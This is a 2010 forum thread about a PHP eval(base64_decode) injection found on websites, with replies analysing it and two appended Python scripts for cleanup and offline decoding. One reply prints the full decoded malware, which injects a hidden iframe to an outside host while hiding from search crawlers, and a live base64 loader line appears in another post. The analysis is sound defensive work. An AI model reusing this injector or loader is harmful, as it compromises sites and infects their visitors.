Can someone tell me about this code: <?php /**/ eval(base64_decode(""));?>

Discussion in 'Security' started by learnwebsitedesigncom, Feb 25, 2010.

  1. #1
    Can someone tell me about this code: <?php /**/ eval(base64_decode(""));?>

    Thank You
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  2. 0x00

    0x00 Well-Known Member

    #2
    Executes encoded code after decoding it. It all lies in the base64_decode("[THIS BIT]"), which, if you post it, we can tell you exactly what the script executes :)
     
    0x00, Feb 25, 2010 IP
  3. Shagoon

    Shagoon Notable Member

    #3
    If you found such a thing on your site and you don't know about it, and you didn't buy any scripts that are encrypted/protected, then it's most likely a shell script that is encrypted.
     
    Shagoon, Feb 25, 2010 IP
  4. learnwebsitedesigncom

    learnwebsitedesigncom Active Member

    #4
    The exact code is:

    <?php /**/ eval(base64_decode("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"));?>
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  5. Shagoon

    Shagoon Notable Member

    #5
    This is your decrypted code...

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
        // Guard so the hook is registered only once per request.
        $GLOBALS['mr_no']=1;
        if(!function_exists('mrobh')){
            if(!function_exists('gml')){
                // Builds the payload to inject. Googlebot and Yahoo crawlers get an
                // empty string, so search engines never see the iframe.
                function gml(){
                    if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                        // The unescape() argument decodes to:
                        // document.write('<iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0></iframe>');
                        return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';
                    }
                    return "";
                }
            }
            if(!function_exists('gzdecode')){
                // Fallback gzdecode() for PHP builds that lack it: read the gzip header
                // flags, skip the optional header fields, then inflate the deflate stream.
                function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                    $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); // FLG byte
                    $RBE4C4D037E939226F65812885A53DAD9=10; // offset just past the fixed 10-byte header
                    $RA3D52E52A48936CDE0F5356BB08652F2=0;  // unused
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ // FEXTRA: 2-byte length plus extra field
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                        $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ // FNAME: NUL-terminated original file name
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ // FCOMMENT: NUL-terminated comment
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ // FHCRC: 2-byte header CRC
                        $RBE4C4D037E939226F65812885A53DAD9+=2;
                    }
                    $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                    if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                        // Not gzip after all: pass the buffer through unchanged.
                        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                    }
                    return $R034AE2AB94F99CC81B389A1822DA3353;
                }
            }
            // Output-buffer callback: decompress the finished page, then splice the
            // injected script in just before </body> (or append it if there is none).
            function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
                Header('Content-Encoding: none');
                $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
                if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                    return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
                }else{
                    return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
                }
            }
            // Capture everything the real page prints so mrobh() can rewrite it on the way out.
            ob_start('mrobh');
        }
    }
    Code (markup):
     
    Shagoon, Feb 25, 2010 IP
  6. learnwebsitedesigncom

    learnwebsitedesigncom Active Member

    #6
    I have a few more questions:

    I am familiar with PHP but not an expert and will try to find more info, but what exactly does the code do?

    What are the most common ways of putting this code into web pages?

    Thanks
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  7. Shagoon

    Shagoon Notable Member

    #7
    Where do you have this code from?

    It doesn't look like a shell script.
     
    Shagoon, Feb 25, 2010 IP
  8. learnwebsitedesigncom

    learnwebsitedesigncom Active Member

    #8
    The code is at the very top (the first line) of the pages of one of my sites.
     
    learnwebsitedesigncom, Feb 25, 2010 IP
  9. Carl29

    Carl29 Active Member

    #9
    Hi learnwebsitedesigncom,
    The same thing happened to me, this is the code on top of the php files.
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3Rlc3NmYXMxL3B1YmxpY19odG1sL3Rlc3NmYXNoaW9uLmNvbS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
    <?php
    Code (markup):

    Did you manage to clean that up? What would you recommend?
    Thanks :)
     
    Carl29, Mar 1, 2010 IP
  10. WeWatch

    WeWatch Active Member

    #10
    That code, and other code similar to it, allows hackers to remotely infect your website after you've changed FTP passwords.

    Also look in your images folders to see if you have a file called gifimg.php. It's malicious as well.

    From what we've seen, this type of infection is usually the result of a virus on a PC that has FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP login and password.

    The virus works in a variety of ways.

    First, if you're using a program like FileZilla or CuteFTP or any of the other free programs, your login credentials are stored in a plain text file on your PC. For FileZilla, look in: C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml

    If you have multiple accounts setup in FileZilla, you'll see all of them listed in plain text in that file. That makes it extremely easy for a virus to find and steal.

    Second, the virus works by "sniffing" the FTP traffic leaving your PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal that information.

    Third, the virus also acts as a keylogger. So for those who don't save their credentials but type it in each time, the virus can still get it.

    I use WS_FTP by IpSwitch because they encrypt their saved credentials. You can also switch to SFTP if your hosting provider supports it. SFTP encrypts the traffic between your PC and the destination.

    Quite often it requires a different anti-virus program to find and remove the virus on the infected PC. The virus learns how to evade detection from the currently installed anti-virus.

    I usually recommend either Kaspersky or Vipre (Sunbelt Software).

    Remove all of those eval(base64_decode strings, then scan all PCs with a different anti-virus program, after changing all FTP passwords.
     
    WeWatch, Mar 1, 2010 IP
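The cleanup step WeWatch describes (strip every injected eval(base64_decode) line, then look for dropped files such as gifimg.php) as an added example script. This is not code from the thread or from any poster; it only knows the injection shape the thread shows (a first line of the form `<?php /**/ eval(base64_decode("..."));?>`), the file name gifimg.php is taken from WeWatch's post, and the .bak naming and the `--fix` flag are this example's own choices. Run it against a copy of the site first: the default is a dry run that only reports.

```python
"""Added example, not code from the thread: find every PHP file whose
first statement is the injected <?php /**/ eval(base64_decode("...")); ?>
line and strip that statement, keeping a .bak copy of each file touched.
Paths, the .bak suffix and the --fix flag are this example's assumptions."""
import os
import re
import shutil
from typing import List, Tuple

# The injection described in the thread: PHP open tag, empty comment,
# eval(base64_decode(<base64>)), close tag, all as the file's first line.
# Anything that does not sit at the very start of the file is deliberately
# left alone so legitimate code is never touched.
INJECTION_RE = re.compile(
    r'^<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*'
    r'[\'"][A-Za-z0-9+/=]*[\'"]\s*\)\s*\)\s*;\s*\?>\s*'
)

# File names WeWatch reports being dropped alongside the injection.
SUSPECT_NAMES = {'gifimg.php'}


def strip_injection(source: str) -> Tuple[str, bool]:
    """Return (cleaned_source, was_infected).

    Only the leading injected statement is removed; the rest of the file,
    including the site's own <?php tag that follows it, is kept verbatim."""
    cleaned, count = INJECTION_RE.subn('', source, count=1)
    return cleaned, count == 1


def clean_tree(root: str, dry_run: bool = True) -> Tuple[List[str], List[str]]:
    """Walk root and return (infected_php_files, suspect_files).

    With dry_run=True nothing is written. Otherwise each infected file is
    copied to <name>.bak and rewritten without the injected line."""
    infected: List[str] = []
    suspects: List[str] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if name in SUSPECT_NAMES:
                suspects.append(path)
            if not name.endswith('.php'):
                continue
            # surrogateescape keeps non-UTF-8 bytes intact on the round trip.
            with open(path, encoding='utf-8', errors='surrogateescape') as fh:
                source = fh.read()
            cleaned, hit = strip_injection(source)
            if not hit:
                continue
            infected.append(path)
            if not dry_run:
                shutil.copy2(path, path + '.bak')
                with open(path, 'w', encoding='utf-8', errors='surrogateescape') as fh:
                    fh.write(cleaned)
    return infected, suspects


if __name__ == '__main__':
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else '.'
    hits, found = clean_tree(root, dry_run='--fix' not in sys.argv)
    for p in hits:
        print('injected eval(base64_decode) line:', p)
    for p in found:
        print('suspect file name:', p)
```

Usage: `python clean_eval.py /path/to/copy/of/site` lists what would change; add `--fix` to rewrite. Stripping the line removes the hook, but as the thread says the attacker still holds the credentials that put it there, so the password change and PC scan have to happen before the site goes back up.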
  11. Carl29

    Carl29 Active Member

    #11
    Hi WeWatch,
    By now it is almost impossible ( :) ) to have any virus on my PC, I just reinstalled everything to discard any virus. As for the AV, I use Bitdefender IS 2010 with all features on maximum level (firewall+AV), I also use a router with an integrated firewall between my PC and the broadband company router.
    I've changed all ftp passwords and changed user logins.
    As for the FTP client, I was using FileZilla, now changed to WinSCP, and I don't save passwords anymore...
    My question is, should I clean all the php files or reinstall website from scratch?
    Can the DB be infected also?

    Thanks

    edit: can you please check the attached htaccess file to see if it has been manipulated.
    Thanks again
     


    Last edited: Mar 1, 2010
    Carl29, Mar 1, 2010 IP
  12. Archimonde

    Archimonde Peon

    #12
    Hello,
    You want to decode that script. Please see this example:
    <?php eval(base64_decode('xxxxxxxxxxxxxxxxxxxxx'));?>
    PHP:
    Change your code to:
    <?php echo(base64_decode('xxxxxxxxxxxxxxxxxxxxx'));?>
    PHP:
    Then load it via Apache, and you will see the decoded source.
     
    Archimonde, Mar 5, 2010 IP
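Archimonde's eval-to-echo swap does decode the payload, but it runs the modified file on the live web server. The script below is an added example, not code from the thread or from any poster, that does the same decoding offline in Python and never executes anything: it peels the base64 layer(s) out of an `eval(base64_decode('...'))` line, then pulls out what an incident responder wants from the decoded PHP: file paths it includes, the `ob_start` callback it registers, the user agents it hides from, and the iframe URL buried in the `unescape("%..")` string of the code Shagoon posted. The two SAMPLE_* inputs are strings copied from this thread (Carl29's injected line and the gml() function from Shagoon's decoded code); the function names, regexes and the indicator categories are this example's own assumptions.

```python
"""Added example, not code from the thread: decode an
eval(base64_decode('...')) injection offline and list what it does,
without executing any of it. SAMPLE_* are copied from the thread;
everything else is this example's own construction."""
import base64
import re
from typing import Dict, List
from urllib.parse import unquote

# Carl29's injected first line, as posted in the thread.
SAMPLE_INJECTED_LINE = (
    "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3Rlc3NmYXMxL3B1YmxpY19odG1sL3Rlc3NmYXNoaW9uLmNvbS9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>"
)
# The gml() function from the code Shagoon decoded, as posted in the thread.
SAMPLE_GML = r"""function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>'; } return ""; }"""

EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)")
UNESCAPE_RE = re.compile(
    r"unescape\s*\(\s*['\"]((?:%u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|[^'\"])*)['\"]\s*\)")


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a byte."""
    s = re.sub(r'%u([0-9A-Fa-f]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_eval_layers(source: str, max_depth: int = 10) -> List[str]:
    """Return successively decoded PHP layers, outermost first.
    Stops when no eval(base64_decode(...)) remains or the base64 is invalid."""
    layers: List[str] = []
    current = source
    for _ in range(max_depth):
        m = EVAL_B64_RE.search(current)
        if not m:
            break
        raw = re.sub(r'\s+', '', m.group(1))
        try:
            current = base64.b64decode(raw, validate=True).decode('utf-8', 'replace')
        except ValueError:  # binascii.Error is a subclass of ValueError
            break
        layers.append(current)
    return layers


def extract_indicators(php: str) -> Dict[str, List[str]]:
    """Pull responder-relevant facts out of decoded PHP without running it."""
    ind: Dict[str, List[str]] = {
        # Absolute .php paths the code references (the file it includes).
        'paths': re.findall(r"['\"](/[^'\"]+\.php)['\"]", php),
        # Output-buffer callbacks it registers (where the page gets rewritten).
        'ob_callbacks': re.findall(r"ob_start\s*\(\s*['\"](\w+)['\"]\s*\)", php),
        # User agents it checks for, i.e. the crawlers it hides from.
        'ua_filters': re.findall(
            r"stristr\s*\(\s*\$_SERVER\[\"HTTP_USER_AGENT\"\]\s*,\s*\"(\w+)\"", php),
        'js': [],
        'iframes': [],
    }
    for m in UNESCAPE_RE.finditer(php):
        js = js_unescape(m.group(1))
        ind['js'].append(js)
        ind['iframes'] += re.findall(r"<iframe[^>]*\bsrc=[\"']([^\"']+)[\"']", js, re.I)
    return ind


def triage(source: str) -> Dict[str, object]:
    """Decode all eval layers and report indicators from the innermost one."""
    layers = decode_eval_layers(source)
    innermost = layers[-1] if layers else source
    return {'layers': layers, 'indicators': extract_indicators(innermost)}


if __name__ == '__main__':
    for label, sample in (('Carl29 line', SAMPLE_INJECTED_LINE), ('Shagoon gml()', SAMPLE_GML)):
        result = triage(sample)
        print('==', label)
        for i, layer in enumerate(result['layers'], 1):
            print(f'-- layer {i}:\n{layer}')
        print('-- indicators:', result['indicators'])
```

Run it on a copy of the infected file's first line rather than on the server. For Carl29's line it shows a loader that include_once()s a dropped file (a `.css.php` under the admin languages directory) and registers an `ob_start('dgobh')` callback; for Shagoon's gml() it shows the iframe URL and that Googlebot and Yahoo are excluded, which is why the injection is invisible in search results and only hits real visitors.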